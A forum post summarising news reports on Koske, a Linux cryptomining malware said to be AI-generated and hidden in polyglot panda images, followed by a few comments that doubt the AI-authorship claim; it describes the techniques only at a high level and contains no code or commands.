Aqua Nautilus research uncovers Koske, a new, sophisticated AI-generated Linux malware that uses image-based delivery, rootkits, and stealthy persistence

A sophisticated Linux malware called Koske, discovered in July 2025, hides malicious code within innocent-looking panda bear JPEG images to deploy cryptocurrency miners and establish persistent system access[1]. Security researchers at AquaSec believe Koske was developed using artificial intelligence, based on its adaptive behaviors and code structure[2].

The malware exploits misconfigured JupyterLab instances to gain initial access, then downloads two panda images containing separate payloads - a C-based rootkit and a shell script[3]. Rather than using steganography, Koske employs polyglot files that function as both valid images and executable scripts[1:1].

Once executed, the malware:

  • Deploys CPU and GPU-optimized miners for 18 different cryptocurrencies
  • Establishes persistence through cron jobs and systemd services
  • Uses LD_PRELOAD to hide malicious processes and files
  • Manipulates DNS settings and network configurations
  • Automatically switches mining pools if one becomes unavailable[1:2]

“Impersonation and psychological warfare will be a big thing in the coming years,” warns Rem Dudas from Palo Alto Networks, noting how AI enables malware to mimic other threat actors’ techniques[4].

  1. BleepingComputer - New Koske Linux malware hides in cute panda images ↩︎ ↩︎ ↩︎

  2. The420 - How Is A “Panda” Becoming a Persistent Threat? ↩︎

  3. Securitricks - AI-Generated Malware in Panda Image Hides Persistent Linux Threat ↩︎

  4. BetaNews - Hackers are using AI and panda images to infect Linux machines ↩︎

  • baod_rate@programming.dev
    0·
    6 days ago

    Researchers from AquaSec have noted its ability to automatically switch to backup mining pools if a primary one becomes unavailable, ensuring continuous operation. This level of sophistication has led security experts to believe that large language models or other automation frameworks may have played a role in its development.

    Is it just me or is this not a very convincing rationale.

    • AmbitiousProcess (they/them)@piefed.socialEnglish
      0·
      6 days ago

      Not whatsoever.

      Practically any mining software would allow you to change a pool whenever you felt like it, and making a script that just goes “oh, x.x.x.x isn’t responding anymore, I should point my hashrate to y.y.y.y now” is… not hard, to say the least.

    • baod_rate@programming.dev
      0·
      6 days ago

      It’s just a consequence of independent file formats. There’s bound to be overlap in what counts as technically a valid X and also technically a valid Y. It’s pretty much unavoidable. The tricky part is figuring out what fits in that sliver of the venn diagram but is also useful as malware.